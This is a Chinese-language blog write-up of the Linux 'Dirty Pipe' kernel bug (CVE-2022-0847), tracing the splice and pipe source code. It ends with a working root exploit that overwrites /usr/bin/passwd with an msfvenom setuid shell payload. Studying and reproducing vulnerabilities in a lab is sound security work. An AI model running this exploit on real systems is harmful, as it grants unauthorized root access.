PS:splice将数据从fd_in传递到文件描述符fd_out,其中两个文件描述符之一必须引用管道。对于fd_in来说,若其是一个管道文件描述符,则off_in必须被设置为NULL;若它不是一个管道描述符,则off_in表示从输入数据流的何处开始读入数据:此时若其被设置为NULL,则从输入数据的当前偏移位置读入,否则off_in指出具体的偏移位置。以上对于fd_out和off_out同样适用,只不过其用于输出数据流。

splice & pipe

针对上述情况,我们只需创建一个管道,然后通过两次splice便能完成两个文件间的数据拷贝

大概样例如下所示

1
2
3
4
5
6
7
8
......
pipe(pipe_fd);
/* Step 1, file -> pipe: splice up to 0x100 bytes of source_file into the pipe's write end. */
src_fd = open("source_file", O_RDWR);
splice(src_fd, NULL, pipe_fd[1], NULL, 0x100, SPLICE_F_MOVE);

/* Step 2, pipe -> file: splice the same bytes from the pipe's read end into dest_file. */
dest_fd = open("dest_file", O_RDWR);
splice(pipe_fd[0], NULL, dest_fd, NULL, 0x100, SPLICE_F_MOVE);
......

无需进行内核空间和用户空间的拷贝,直接在内核完成一条龙服务

do_splice

根据管道->管道、管道->文件、文件->管道,分为三个分支

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
/*
* Determine where to splice to/from.
*/
/*
* do_splice - dispatch a splice request according to which ends are pipes.
* @in:      source file (must have FMODE_READ)
* @off_in:  user pointer to the source offset, or NULL; must be NULL for a pipe
* @out:     destination file (must have FMODE_WRITE)
* @off_out: user pointer to the destination offset, or NULL; must be NULL for a pipe
* @len:     number of bytes requested
* @flags:   SPLICE_F_* flags; SPLICE_F_NONBLOCK is added when the relevant
*           file has O_NONBLOCK set
*
* Three cases: pipe -> pipe, pipe -> file, file -> pipe. Returns the result
* of the selected helper, or a negative errno; -EINVAL when neither end is a
* pipe.
*/
long do_splice(struct file *in, loff_t __user *off_in,
struct file *out, loff_t __user *off_out,
size_t len, unsigned int flags)
{
struct pipe_inode_info *ipipe;
struct pipe_inode_info *opipe;
loff_t offset;
long ret;

/* The source must be open for reading and the destination for writing, else -EBADF. */
if (unlikely(!(in->f_mode & FMODE_READ) ||
!(out->f_mode & FMODE_WRITE)))
return -EBADF;

/* Look up the pipe behind each file; the branches below treat a NULL result as "not a pipe". */
ipipe = get_pipe_info(in, true);
opipe = get_pipe_info(out, true);

/* Case 1: both ends are pipes. */
if (ipipe && opipe) {
/* Offsets are not allowed on a pipe: -ESPIPE. */
if (off_in || off_out)
return -ESPIPE;

/* Splicing to self would be fun, but... */
/* Source and destination are the same pipe: rejected with -EINVAL. */
if (ipipe == opipe)
return -EINVAL;

/* Either file being O_NONBLOCK makes the whole operation non-blocking. */
if ((in->f_flags | out->f_flags) & O_NONBLOCK)
flags |= SPLICE_F_NONBLOCK;

return splice_pipe_to_pipe(ipipe, opipe, len, flags);
}

/* Case 2: only the source is a pipe (pipe -> file). */
if (ipipe) {
/* No offset may be given for the pipe side. */
if (off_in)
return -ESPIPE;
if (off_out) {
if (!(out->f_mode & FMODE_PWRITE))/* an explicit offset requires FMODE_PWRITE on the output */
return -EINVAL;
if (copy_from_user(&offset, off_out, sizeof(loff_t)))/* fetch the caller's offset */
return -EFAULT;
} else {
offset = out->f_pos;/* no offset given: start at the file's current position */
}

/* Outputs opened with O_APPEND are rejected with -EINVAL. */
if (unlikely(out->f_flags & O_APPEND))
return -EINVAL;

/* Validate the write range via rw_verify_area() (helper not shown here). */
ret = rw_verify_area(WRITE, out, &offset, len);
if (unlikely(ret < 0))
return ret;
/* An O_NONBLOCK source pipe makes the splice non-blocking. */
if (in->f_flags & O_NONBLOCK)
flags |= SPLICE_F_NONBLOCK;

/* Bracket the transfer with file_start_write()/file_end_write(). */
file_start_write(out);
ret = do_splice_from(ipipe, out, &offset, len, flags);/* the actual pipe -> file transfer */
file_end_write(out);

/* Publish the final offset: into f_pos, or back to the caller's off_out. */
if (!off_out)
out->f_pos = offset;
else if (copy_to_user(off_out, &offset, sizeof(loff_t)))
ret = -EFAULT;

return ret;
}
/* Case 3: only the destination is a pipe (file -> pipe). */
if (opipe) {
if (off_out)/* no offset may be given for the pipe side */
return -ESPIPE;
if (off_in) {
if (!(in->f_mode & FMODE_PREAD))/* an explicit offset requires FMODE_PREAD on the input */
return -EINVAL;
if (copy_from_user(&offset, off_in, sizeof(loff_t)))/* fetch the caller's offset */
return -EFAULT;
} else {
offset = in->f_pos;/* no offset given: start at the file's current position */
}

/* An O_NONBLOCK destination pipe makes the splice non-blocking. */
if (out->f_flags & O_NONBLOCK)
flags |= SPLICE_F_NONBLOCK;

/* Take the destination pipe's lock for the transfer. */
pipe_lock(opipe);

/* Wait until the pipe has room (or fail, depending on flags). */
ret = wait_for_space(opipe, flags);
if (!ret) {
unsigned int p_space;

/* Don't try to read more the pipe has space for. */
/*
* p_space = free slots: max_usage minus the current occupancy of the ring.
*/
p_space = opipe->max_usage - pipe_occupancy(opipe->head, opipe->tail);
/* Clamp len to the free slots expressed in bytes (p_space pages). */
len = min_t(size_t, len, p_space << PAGE_SHIFT);

ret = do_splice_to(in, &offset, opipe, len, flags);
}
/* Release the pipe lock. */
pipe_unlock(opipe);

/* Data went into the pipe: wake its readers. */
if (ret > 0)
wakeup_pipe_readers(opipe);
/* No offset given: store the final position in the input file's f_pos. */
if (!off_in)
in->f_pos = offset;
/* Offset given: copy the final position back to the caller. */
else if (copy_to_user(off_in, &offset, sizeof(loff_t)))
ret = -EFAULT;

return ret;
}

return -EINVAL;
}

管道->管道

并不是很重要,就放一边吧😋

splice_pipe_to_pipe

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
/*
* Splice contents of ipipe to opipe.
*
* @ipipe: source pipe, consumed from its tail
* @opipe: destination pipe, filled at its head
* @len:   maximum number of bytes to move
* @flags: SPLICE_F_* flags; SPLICE_F_NONBLOCK turns "no progress possible"
*         into -EAGAIN instead of a retry
*
* Returns the number of bytes moved, 0 when the input is empty and has no
* writers, or a negative errno.
*/
static int splice_pipe_to_pipe(struct pipe_inode_info *ipipe,
struct pipe_inode_info *opipe,
size_t len, unsigned int flags)
{
struct pipe_buffer *ibuf, *obuf;
unsigned int i_head, o_head;
unsigned int i_tail, o_tail;
unsigned int i_mask, o_mask;
int ret = 0;
bool input_wakeup = false;


retry:
ret = ipipe_prep(ipipe, flags);
if (ret)
return ret;

ret = opipe_prep(opipe, flags);
if (ret)
return ret;

/*
* Potential ABBA deadlock, work around it by ordering lock
* grabbing by pipe info address. Otherwise two different processes
* could deadlock (one doing tee from A -> B, the other from B -> A).
*/
pipe_double_lock(ipipe, opipe);

i_tail = ipipe->tail;
i_mask = ipipe->ring_size - 1;
o_head = opipe->head;
o_mask = opipe->ring_size - 1;

do {
size_t o_len;

/* Destination has no readers: SIGPIPE, and -EPIPE if nothing was moved yet. */
if (!opipe->readers) {
send_sig(SIGPIPE, current, 0);
if (!ret)
ret = -EPIPE;
break;
}

i_head = ipipe->head;
o_tail = opipe->tail;

/* Input drained and nobody left to refill it: stop. */
if (pipe_empty(i_head, i_tail) && !ipipe->writers)
break;

/*
* Cannot make any progress, because either the input
* pipe is empty or the output pipe is full.
*/
if (pipe_empty(i_head, i_tail) ||
pipe_full(o_head, o_tail, opipe->max_usage)) {
/* Already processed some buffers, break */
if (ret)
break;

if (flags & SPLICE_F_NONBLOCK) {
ret = -EAGAIN;
break;
}

/*
* We raced with another reader/writer and haven't
* managed to process any buffers. A zero return
* value means EOF, so retry instead.
*/
pipe_unlock(ipipe);
pipe_unlock(opipe);
goto retry;
}

ibuf = &ipipe->bufs[i_tail & i_mask];
obuf = &opipe->bufs[o_head & o_mask];

if (len >= ibuf->len) {
/*
* Simply move the whole buffer from ipipe to opipe
*/
/* Struct copy: the output slot takes over every field of the input buffer, flags included. */
*obuf = *ibuf;
ibuf->ops = NULL;
i_tail++;
ipipe->tail = i_tail;
input_wakeup = true;
o_len = obuf->len;
o_head++;
opipe->head = o_head;
} else {
/*
* Get a reference to this pipe buffer,
* so we can copy the contents over.
*/
if (!pipe_buf_get(ipipe, ibuf)) {
if (ret == 0)
ret = -EFAULT;
break;
}
*obuf = *ibuf;

/*
* Don't inherit the gift and merge flags, we need to
* prevent multiple steals of this page.
*/
obuf->flags &= ~PIPE_BUF_FLAG_GIFT;
obuf->flags &= ~PIPE_BUF_FLAG_CAN_MERGE;

/* Split: the output buffer gets the first len bytes, the input buffer keeps the rest. */
obuf->len = len;
ibuf->offset += len;
ibuf->len -= len;
o_len = len;
o_head++;
opipe->head = o_head;
}
ret += o_len;
len -= o_len;
} while (len);

pipe_unlock(ipipe);
pipe_unlock(opipe);

/*
* If we put data in the output pipe, wakeup any potential readers.
*/
if (ret > 0)
wakeup_pipe_readers(opipe);

/* At least one whole input buffer was consumed: wake writers waiting on the input pipe. */
if (input_wakeup)
wakeup_pipe_writers(ipipe);

return ret;
}

文件->管道

do_splice_to

do_splice_to 中最终会调用到内核文件结构体函数表的 splice_read 指针,对于不同的文件系统而言该函数指针不同,以 ext4 文件系统为例,查表 ext4_file_operations,对应调用的函数应为 generic_file_splice_read

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
/*
* Attempt to initiate a splice from a file to a pipe.
*
* @in:    source file (must have FMODE_READ, else -EBADF)
* @ppos:  in/out file position
* @pipe:  destination pipe
* @len:   bytes requested; capped at MAX_RW_COUNT
* @flags: SPLICE_F_* flags, passed through to the handler
*
* Returns whatever the file's ->splice_read (or the default implementation)
* returns, or a negative errno from the checks.
*/
static long do_splice_to(struct file *in, loff_t *ppos,
struct pipe_inode_info *pipe, size_t len,
unsigned int flags)
{
int ret;

if (unlikely(!(in->f_mode & FMODE_READ)))
return -EBADF;
/* Validate the read range via rw_verify_area() (helper not shown here). */
ret = rw_verify_area(READ, in, ppos, len);
if (unlikely(ret < 0))
return ret;

if (unlikely(len > MAX_RW_COUNT))
len = MAX_RW_COUNT;

/* Prefer the file's own ->splice_read; otherwise use the generic fallback. */
if (in->f_op->splice_read)
return in->f_op->splice_read(in, ppos, pipe, len, flags);
return default_file_splice_read(in, ppos, pipe, len, flags);
}

generic_file_splice_read

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
/*
* generic_file_splice_read - splice from a file into a pipe through the
* file's ->read_iter.
* @in:    source file
* @ppos:  in/out file position; updated only when data was read
* @pipe:  destination pipe
* @len:   maximum number of bytes
* @flags: SPLICE_F_* flags (not used in this body)
*
* Returns the read_iter result; a -EFAULT from it is reported as -EAGAIN.
*/
ssize_t generic_file_splice_read(struct file *in, loff_t *ppos,
struct pipe_inode_info *pipe, size_t len,
unsigned int flags)
{
struct iov_iter to;
struct kiocb kiocb;
unsigned int i_head;
int ret;
/* Set up `to` as a pipe-backed iterator holding up to len bytes, so read output lands in the pipe. */
iov_iter_pipe(&to, READ, pipe, len);
i_head = to.head;
/* Synchronous kiocb on the source file, positioned at *ppos. */
init_sync_kiocb(&kiocb, in);
kiocb.ki_pos = *ppos;

/* Invoke the file's read_iter with the pipe iterator as the destination. */
ret = call_read_iter(in, &kiocb, &to);
if (ret > 0) {
*ppos = kiocb.ki_pos;
file_accessed(in);
} else if (ret < 0) {
/* Error: rewind the iterator to where it started so anything emitted is freed. */
to.head = i_head;
to.iov_offset = 0;
iov_iter_advance(&to, 0); /* to free what was emitted */
/*
* callers of ->splice_read() expect -EAGAIN on
* "can't put anything in there", rather than -EFAULT.
*/
if (ret == -EFAULT)
ret = -EAGAIN;
}

return ret;
}

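在ext4文件系统中,read_iter实际为ext4_file_read_iter(普通读最终走到generic_file_read_iter);而tmpfs(shmem)对应的是shmem_file_read_iter,两者最终都会调用copy_page_to_iter。下面以shmem_file_read_iter为例,这B函数调用链有点小长,贴个调用链先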

1
2
3
4
shmem_file_read_iter
shmem_getpage;根据文件索引获取页框
copy_page_to_iter;将页框数据复制到目标缓冲区中
copy_page_to_iter_pipe();如果目标缓冲区是管道迭代器,将数据复制到管道缓冲区中

copy_page_to_iter_pipe

最终在 copy_page_to_iter_pipe() 中,将对应的 pipe_buffer->page 设为文件映射的页面集的对应页框,将页框引用计数 + 1(get_page()),这样就完成了一个从文件读取数据到管道的过程,因为是直接建立页面的映射,所以每次操作后都会将 head +1

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
/*
* copy_page_to_iter_pipe - attach (not copy) a page to a pipe-backed iterator.
* @page:   page to reference
* @offset: start of the data inside @page
* @bytes:  number of bytes; clamped to the iterator's remaining count
* @i:      pipe iterator
*
* Either extends the current slot, when the new data continues the same page,
* or fills the next slot with a reference to @page. Returns the number of
* bytes accepted, or 0 when there are no bytes, the iterator fails its sanity
* check, or the pipe is full.
*
* Note: buf->flags is never assigned in this function, so the slot keeps
* whatever flag bits it held before.
*/
static size_t copy_page_to_iter_pipe(struct page *page, size_t offset, size_t bytes,
struct iov_iter *i)
{
struct pipe_inode_info *pipe = i->pipe;
struct pipe_buffer *buf;
unsigned int p_tail = pipe->tail;
unsigned int p_mask = pipe->ring_size - 1;
unsigned int i_head = i->head;
size_t off;

if (unlikely(bytes > i->count))
bytes = i->count;

if (unlikely(!bytes))
return 0;

if (!sanity(i))
return 0;

/*
* off is the iterator's current iov_offset (a size_t, not a pointer). When
* it is non-zero, either extend that slot (same page, contiguous offset) or
* step to the next slot.
*/
off = i->iov_offset;
buf = &pipe->bufs[i_head & p_mask];
if (off) {
if (offset == off && buf->page == page) {
/* merge with the last one */
buf->len += bytes;
i->iov_offset += bytes;
goto out;
}
i_head++;
buf = &pipe->bufs[i_head & p_mask];
}
if (pipe_full(i_head, p_tail, pipe->max_usage))
return 0;

/* Fill the slot with a counted reference to the caller's page; ops, page, offset and len are set, flags is not. */
buf->ops = &page_cache_pipe_buf_ops;
get_page(page);
buf->page = page;
buf->offset = offset;
buf->len = bytes;

pipe->head = i_head + 1;
i->iov_offset = offset + bytes;
i->head = i_head;
out:
i->count -= bytes;
return bytes;
}

PS:此处并没有对pipe_buffer->flags的设置操作

管道->文件

do_splice_from

do_splice_from 最终会根据所操作的文件的属性调用相应的内核文件结构中的 splice_write() 函数指针。

1
2
3
4
5
6
7
8
9
10
11
/*
 * Start a pipe-to-file splice: use the destination file's own splice_write
 * handler when it provides one, otherwise fall back to
 * default_file_splice_write().
 */
static long do_splice_from(struct pipe_inode_info *pipe, struct file *out,
			   loff_t *ppos, size_t len, unsigned int flags)
{
	/* No file-specific handler: take the generic path. */
	if (!out->f_op->splice_write)
		return default_file_splice_write(pipe, out, ppos, len, flags);

	return out->f_op->splice_write(pipe, out, ppos, len, flags);
}

iter_file_splice_write

ext4文件系统中,这个函数指针是iter_file_splice_write,最终会调用如下函数

1
2
3
4
5
6
7
iter_file_splice_write
splice_from_pipe_next ;检查管道可用性
vfs_iter_write ;将读取的数据写入目标文件
do_iter_write
do_iter_readv_writev
call_write_iter
generic_file_write_iter ;后面还有,但应该就是普通的拷贝数据之类的

0x03:漏洞分析

我们现在知道以下几点

  • PIPE_BUF_FLAG_CAN_MERGE 是标识 pipe_buffer->page 能否被后续写入(合并追加数据)的标志
  • pipe_write中会将pipe_buffer->flags设置成PIPE_BUF_FLAG_CAN_MERGE
  • pipe_read中读取完成后free这些page并不会把flags置0
  • 从文件复制到管道时,copy_page_to_iter_pipe 只通过 get_page 取得页面引用,不会重新设置 flags。因此此时 pipe_buffer 指向的 page 是目标文件映射的 page,而 pipe_buffer->flags & PIPE_BUF_FLAG_CAN_MERGE 仍然为真,表示此时对这个 page 拥有写入权限了。这就意味着如果我们打开的是一个只有只读权限的文件,现在可以越权写入

于是有了这样一个思路

  • step Ⅰ:创建一个pipe
  • step Ⅱ:把pipe写满,使所有pipe_buffer->flags都被设置上PIPE_BUF_FLAG_CAN_MERGE
  • step Ⅲ:读取pipe中的所有数据,清空pipe
  • step Ⅳ:打开目标文件,利用splice将内容从文件拷贝到管道,此时pipe_buffer->page为文件在内存中的映射页框,pipe_buffer->flags保留有之前设置的PIPE_BUF_FLAG_CAN_MERGE,此时在管道中对该文件具有写入权限。pipe head +1
  • step Ⅴ:利用write向管道中写入恶意数据,因为上一个 pipe_buffer 没有写满,从而将数据拷贝到上一个 pipe_buffer 对应的页面——即文件映射的页面。完成越权写入

0x04:漏洞利用

demo

经过上述分析利用demo就很好写了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sys/mman.h>


#define PAGE_SIZE 0x1000
#define PIPE_DEF_BUFFERS 16
#define DATA_SIZE PAGE_SIZE*PIPE_DEF_BUFFERS

struct stat dest_st;
int pipe_fd[2], dest_fd;
pid_t fork_pid;
char * data;

/*
 * Print a red "[x] Error at:" banner followed by msg on stdout, wait five
 * seconds, then terminate the process with EXIT_FAILURE.
 */
void err_exit(char *msg)
{
	fputs("\033[31m\033[1m[x] Error at: \033[0m", stdout);
	puts(msg);
	sleep(5);
	exit(EXIT_FAILURE);
}


/*
 * Demo entry point. argv[1] is the path of the file that is opened read-only.
 * envp is not used.
 *
 * NOTE(review): argc is never checked before argv[1] is used, and the return
 * values of mmap/pipe/write/read/fstat/splice are not checked.
 */
int main(int argc , char * argv[], char * envp[])
{
// Anonymous private scratch buffer of DATA_SIZE bytes, used as the source for
// the pipe write and the destination for the pipe read below.
// NOTE(review): the last mmap argument is the offset; NULL is passed where 0
// is presumably intended.
data = mmap(NULL, DATA_SIZE, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, NULL);

puts("[*] make pipe_buffer all flags-> PIPE_BUF_FLAG_CAN_MERGE");
pipe(pipe_fd);
fork_pid = fork();
if (fork_pid < 0)
{
err_exit("fork failed!");
} else if (fork_pid == 0)
{
// Child: write DATA_SIZE bytes into the pipe, then exit.
puts("[*] pipe write");
write(pipe_fd[1], data, DATA_SIZE);
exit(0);
}
// Parent: read the data back out of the pipe.
// NOTE(review): a single read() may return fewer than DATA_SIZE bytes.
puts("[*] pipe read");
read(pipe_fd[0], data, DATA_SIZE);


dest_fd = open(argv[1], O_RDONLY);
if (dest_fd < 0)
err_exit("open dest file failed!");

// dest_st is filled here but not read again in this function.
fstat(dest_fd, &dest_st);

puts("[*] keep the flags->PIPE_BUF_FLAG_CAN_MERGE");
// Splice a single byte from the file into the write end of the pipe.
splice(dest_fd, NULL, pipe_fd[1], NULL, 1, SPLICE_F_MOVE);

puts("[*] overwrite now");
// Ordinary write of an 11-byte marker string into the same pipe.
write(pipe_fd[1], "\nkorey0sh1\n", 11);

return 0;

}

随便用qemu起了个环境,kernel version = 5.8

效果还是很成功的

提权

常规的suid提权方式

查看具有root权限的suid文件

1
find / -perm -u=s -type f 2>/dev/null

此处还是选择老朋友/usr/bin/passwd

用msf生成提权的shellcode

1
msfvenom -p linux/x64/exec PrependSetuid=True -f elf | xxd -i

final exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
#define _GNU_SOURCE
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <string.h>
#include <sys/mman.h>


#define PAGE_SIZE 0x1000
#define PIPE_DEF_BUFFERS 16
#define DATA_SIZE PAGE_SIZE*PIPE_DEF_BUFFERS

struct stat dest_st;
int pipe_fd[2], dest_fd;
pid_t fork_pid;
char * data;

unsigned char attack_data[] = {
0x7f, 0x45, 0x4c, 0x46, 0x02, 0x01, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x02, 0x00, 0x3e, 0x00, 0x01, 0x00, 0x00, 0x00,
0x78, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x38, 0x00, 0x01, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x07, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x40, 0x00, 0x00, 0x00, 0x00, 0x00,
0x95, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb2, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x48, 0x31, 0xff, 0x6a, 0x69, 0x58, 0x0f, 0x05, 0x48, 0xb8, 0x2f, 0x62,
0x69, 0x6e, 0x2f, 0x73, 0x68, 0x00, 0x99, 0x50, 0x54, 0x5f, 0x52, 0x5e,
0x6a, 0x3b, 0x58, 0x0f, 0x05
};

int data_len = 149;

/*
 * Print a red "[x] Error at:" banner followed by msg on stdout, wait five
 * seconds, then terminate the process with EXIT_FAILURE.
 */
void err_exit(char *msg)
{
	fputs("\033[31m\033[1m[x] Error at: \033[0m", stdout);
	puts(msg);
	sleep(5);
	exit(EXIT_FAILURE);
}


/*
 * Entry point. argv[1] is the path of the file that is opened read-only.
 * envp is not used.
 *
 * NOTE(review): argc is never checked before argv[1] is used, and the return
 * values of mmap/pipe/write/read/fstat/splice are not checked.
 */
int main(int argc , char * argv[], char * envp[])
{
// Anonymous private scratch buffer of DATA_SIZE bytes, used as the source for
// the pipe write and the destination for the pipe read below.
// NOTE(review): the last mmap argument is the offset; NULL is passed where 0
// is presumably intended.
data = mmap(NULL, DATA_SIZE, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_PRIVATE, -1, NULL);

puts("[*] make pipe_buffer all flags-> PIPE_BUF_FLAG_CAN_MERGE");
pipe(pipe_fd);
fork_pid = fork();
if (fork_pid < 0)
{
err_exit("fork failed!");
} else if (fork_pid == 0)
{
// Child: write DATA_SIZE bytes into the pipe, then exit.
puts("[*] pipe write");
write(pipe_fd[1], data, DATA_SIZE);
exit(0);
}
// Parent: read the data back out of the pipe.
// NOTE(review): a single read() may return fewer than DATA_SIZE bytes.
puts("[*] pipe read");
read(pipe_fd[0], data, DATA_SIZE);


dest_fd = open(argv[1], O_RDONLY);
if (dest_fd < 0)
err_exit("open dest file failed!");

// dest_st is filled here but not read again in this function.
fstat(dest_fd, &dest_st);

puts("[*] keep the flags->PIPE_BUF_FLAG_CAN_MERGE");
// Splice a single byte from the file into the write end of the pipe.
splice(dest_fd, NULL, pipe_fd[1], NULL, 1, SPLICE_F_MOVE);

puts("[*] overwrite now");
// Start from the second byte: attack_data[0] is skipped and data_len - 1
// bytes are written (presumably because one byte was already spliced in
// above — confirm).
write(pipe_fd[1], &attack_data[1], data_len-1);

return 0;

}

环境:

运行效果

some tricks

笔者在最后一直苦于找不到合适的kernel版本的虚拟机呜呜呜呜呜,因为下了个挺古早版本的ubuntu20,觉得应该能符合版本要求

结果这玩意会自动更新,装好之后漏洞都已经被patch了

最后发现了xi@0ji233 的文章,了解到了一种十分方便快捷的更换kernel版本的方法

首先先用apt寻找一下这个版本

1
# -F matches "5.8." literally; unquoted, each "." would be a regex wildcard.
apt-cache search linux | grep -F '5.8.'

选择这个

下载

1
sudo apt install linux-image-5.8.0-63-generic

接下来更改grub启动项

1
sudo gedit /etc/default/grub

改成这样

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
# If you change this file, run 'update-grub' afterwards to update
# /boot/grub/grub.cfg.
# For full documentation of the options in this file, see:
# info -f grub -n 'Simple configuration'

GRUB_DEFAULT=0
GRUB_TIMEOUT_STYLE=hidden
GRUB_TIMEOUT=30
GRUB_DISTRIBUTOR=`lsb_release -i -s 2> /dev/null || echo Debian`
GRUB_CMDLINE_LINUX_DEFAULT="text"
GRUB_CMDLINE_LINUX="find_preseed=/preseed.cfg auto noprompt priority=critical locale=en_US"

# Uncomment to enable BadRAM filtering, modify to suit your needs
# This works with Linux (no patch required) and with any kernel that obtains
# the memory map information from GRUB (GNU Mach, kernel of FreeBSD ...)
#GRUB_BADRAM="0x01234567,0xfefefefe,0x89abcdef,0xefefefef"

# Uncomment to disable graphical terminal (grub-pc only)
#GRUB_TERMINAL=console

# The resolution used on graphical terminal
# note that you can use only modes which your graphic card supports via VBE
# you can see them in real GRUB with the command `vbeinfo'
#GRUB_GFXMODE=640x480

# Uncomment if you don't want GRUB to pass "root=UUID=xxx" parameter to Linux
#GRUB_DISABLE_LINUX_UUID=true

# Uncomment to disable generation of recovery mode menu entries
#GRUB_DISABLE_RECOVERY="true"

# Uncomment to get a beep at grub start
#GRUB_INIT_TUNE="480 440 1"

更新grub

1
sudo update-grub

reboot重启后,在开机时按住SHIFT(BIOS引导;UEFI引导则按ESC)进入GRUB引导菜单,选择高级选项(Advanced options),选择新下载的内核版本,即可完成环境搭建

0xff:写在最后的最后

The Dirty Pipe Vulnerability — The Dirty Pipe Vulnerability documentation (cm4all.com)

拜读完漏洞发现者的博客,敬佩他居然能从一次小小的CRC校验错误入手,深挖近一年时间,挖掘原本并不熟悉的Linux Kernel

并最终发现了Dirty Pipe这一威力巨大的内核0day

作者的探索精神,值得笔者学习

路漫漫其修远兮,吾将上下而求索

refer

CVE-2022-0847 dirtypipe漏洞复现-二进制漏洞-看雪-安全社区|安全招聘|kanxue.com

【CVE.0x06】CVE-2022-0847 漏洞复现及简要分析 - arttnba3’s blog


CVE-2022-0847(Dirty Pipe) Remake
http://example.com/2024/03/18/dirtypipe/
作者
korey0sh1
发布于
2024年3月18日
许可协议